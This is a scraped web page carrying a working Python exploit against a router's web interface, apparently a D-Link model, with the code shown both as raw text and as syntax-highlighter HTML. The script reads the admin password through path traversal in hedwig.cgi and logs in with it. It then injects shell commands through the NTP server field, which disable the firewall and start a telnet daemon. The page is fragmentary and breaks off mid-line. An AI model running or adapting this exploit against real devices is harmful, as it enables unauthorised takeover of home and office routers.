session.cookies.update({&#8220;uid&#8221;: resp[&#8220;uid&#8221;]})    print(&#8220;Auth login&#8230;&#8221;)  user_name = &#8220;Admin&#8221;  user_pasw = admin_pasw    data = {      &#8220;id&#8221;: user_name,      &#8220;password&#8221;: hmac.new(user_pasw.encode(), (user_name + resp[&#8220;challenge&#8221;]).encode(), &#8220;md5&#8221;).hexdigest().upper()  }  resp = session.post(urljoin(TARGET, &#8220;\/authentication.cgi&#8221;), data=data)  # print(resp.text)    resp = json.loads(resp.text)  if resp[&#8220;status&#8221;].lower() != &#8220;ok&#8221;:      print(&#8220;Failed!&#8221;)      print(resp.text)      sys.exit()  print(&#8220;OK&#8221;)    ############################################################    data = {&#8220;SERVICES&#8221;: &#8220;DEVICE.TIME&#8221;}  resp = session.post(urljoin(TARGET, &#8220;\/getcfg.php&#8221;), data=data)  # print(resp.text)    tree = lxml.etree.fromstring(resp.content)  tree.xpath(&#8220;\/\/ntp\/enable&#8221;)[0].text = &#8220;1&#8221;  tree.xpath(&#8220;\/\/ntp\/server&#8221;)[0].text = &#8220;metelesku; (&#8221; + COMMAND + &#8220;) &amp; exit; &#8221;  tree.xpath(&#8220;\/\/ntp6\/enable&#8221;)[0].text = &#8220;1&#8221;    ############################################################    print(&#8220;hedwig&#8221;)    headers = {&#8220;Content-Type&#8221;: &#8220;text\/xml&#8221;}  data = lxml.etree.tostring(tree)  resp = session.post(urljoin(TARGET, &#8220;\/hedwig.cgi&#8221;), headers=headers, data=data)  # print(resp.text)    tree = lxml.etree.fromstring(resp.content)  result = tree.findtext(&#8220;result&#8221;)  if result.lower() != &#8220;ok&#8221;:      print(&#8220;Failed!&#8221;)      print(resp.text)      sys.exit()  print(&#8220;OK&#8221;)    ############################################################    print(&#8220;pigwidgeon&#8221;)    data = {&#8220;ACTIONS&#8221;: &#8220;SETCFG,ACTIVATE&#8221;}  resp = session.post(urljoin(TARGET, &#8220;\/pigwidgeon.cgi&#8221;), data=data)  # print(resp.text)    
tree = lxml.etree.fromstring(resp.content)\nresult = tree.findtext(\"result\")\nif result.lower() != \"ok\":\n    print(\"Failed!\")\n    print(resp.text)\n    sys.exit()\nprint(\"OK\")<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-2\"><span class=\"crayon-p\"># pylint: disable=C0103<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-3\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-4\"><span class=\"crayon-p\"># pip3 install requests lxml<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-5\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">hmac<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">json<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-598a38e8ac95e008713212-8\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-9\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urljoin<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-10\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sax<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">saxutils <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">escape<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-11\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">etree<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-12\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-14\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">disable_warnings<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span 
class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">exceptions<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">InsecureRequestWarning<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-16\"><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-19\"><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-20\"><span class=\"crayon-v\">COMMAND<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;;&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">join<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -F&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-s\">&#8220;iptables -X&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -t nat -F&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -t nat -X&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -t mangle -F&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -t mangle -X&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -P INPUT ACCEPT&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -P FORWARD ACCEPT&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;iptables -P OUTPUT ACCEPT&#8221;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;telnetd 
-p 23090 -l \/bin\/date&#8221;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># port &#8216;Z2&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-33\"><span class=\"crayon-v\">session<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">Session<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-34\"><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">verify<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-36\"><span class=\"crayon-p\">############################################################<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-38\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Get password&#8230;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-598a38e8ac95e008713212-40\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;Content-Type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;text\/xml&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-41\"><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;uid&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;whatever&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-42\"><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8220;<span class=\"crayon-ta\">&lt;?<\/span><span class=\"crayon-e\">xml <\/span><span class=\"crayon-i\">version<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1.0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">encoding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;utf-8&#8221;<\/span><span class=\"crayon-ta\">?&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-43\"><span class=\"crayon-s\">&lt;postxml&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-44\"><span class=\"crayon-s\">&lt;module&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-45\"><span 
class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&lt;service&gt;..\/..\/..\/htdocs\/webinc\/getcfg\/DEVICE.ACCOUNT.xml&lt;\/service&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-46\"><span class=\"crayon-s\">&lt;\/module&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-47\"><span class=\"crayon-s\">&lt;\/postxml&gt;&#8221;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-48\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-49\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/hedwig.cgi&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-50\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-598a38e8ac95e008713212-51\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-52\"><span class=\"crayon-p\"># getcfg: &lt;module&gt;&#8230;&lt;\/module&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-53\"><span class=\"crayon-p\"># hedwig: <span class=\"crayon-ta\">&lt;?<\/span><span class=\"crayon-e\">xml <\/span><span class=\"crayon-i\">version<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1.0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">encoding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;utf-8&#8221;<\/span><span class=\"crayon-ta\">?&gt;<\/span><\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-54\"><span class=\"crayon-p\">#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; : &lt;hedwig&gt;&#8230;&lt;\/hedwig&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-55\"><span class=\"crayon-v\">accdata<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">find<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;?xml&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-57\"><span class=\"crayon-v\">admin_pasw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-58\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-59\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">accdata<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-60\"><span class=\"crayon-v\">accounts<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/module\/device\/account\/entry&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-61\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">acc <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">accounts<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">acc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">findtext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">pasw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">acc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">findtext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;password&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;name:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;pass:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pasw<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-s\">&#8220;Admin&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">admin_pasw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pasw<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-68\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-69\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">admin_pasw<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Admin password not found!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-73\"><span class=\"crayon-p\">############################################################<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-74\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-75\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-s\">&#8220;Auth challenge&#8230;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-76\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/authentication.cgi&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-77\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-79\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">json<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">loads<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-80\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;status&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">lower<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ok&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Failed!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-84\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-85\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;uid:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;uid&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-86\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;challenge:&#8221;<\/span><span 
